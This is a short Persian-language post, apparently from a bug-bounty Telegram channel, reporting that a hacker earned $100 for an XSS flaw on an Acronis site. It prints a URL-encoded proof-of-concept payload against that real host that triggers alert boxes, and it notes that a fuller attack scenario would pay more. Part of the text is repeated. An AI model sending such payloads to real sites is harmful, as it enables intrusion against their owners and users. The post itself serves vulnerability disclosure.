✳️ یه شخص هکر یک آسیب پذیری Xss پیدا کرده توی سايت acronis و بابش ۱۰۰ دلار پول گرفته
💢 نکته ای که هست اینه که این شخص فقط یک alert نشون داده و سناریو خاصی برای این آسیب پذیری طراحی نکرده و باعث شده پول کمتری بتونه دریافت بکنه صدرصد اگر سناریو طراحی بشه برای آسیب پذیری، قیمت حداقل چند برابر خواهد شد.
❌ Poc
https://oem.acronis.com/test/testenv.html/%3C/pre%3E%3Cisindex%20type%3Dimage%20src%3D1%20onerror%3Dalert%289166%29%3E%3Cscript%3Ealert(origin)%3C/script%3E
#باگ_بانتی
@UltraSecurity
💢 نکته ای که هست اینه که این شخص فقط یک alert نشون داده و سناریو خاصی برای این آسیب پذیری طراحی نکرده و باعث شده پول کمتری بتونه دریافت بکنه صدرصد اگر سناریو طراحی بشه برای آسیب پذیری، قیمت حداقل چند برابر خواهد شد.
❌ Poc
https://oem.acronis.com/test/testenv.html/%3C/pre%3E%3Cisindex%20type%3Dimage%20src%3D1%20onerror%3Dalert%289166%29%3E%3Cscript%3Ealert(origin)%3C/script%3E
#باگ_بانتی
@UltraSecurity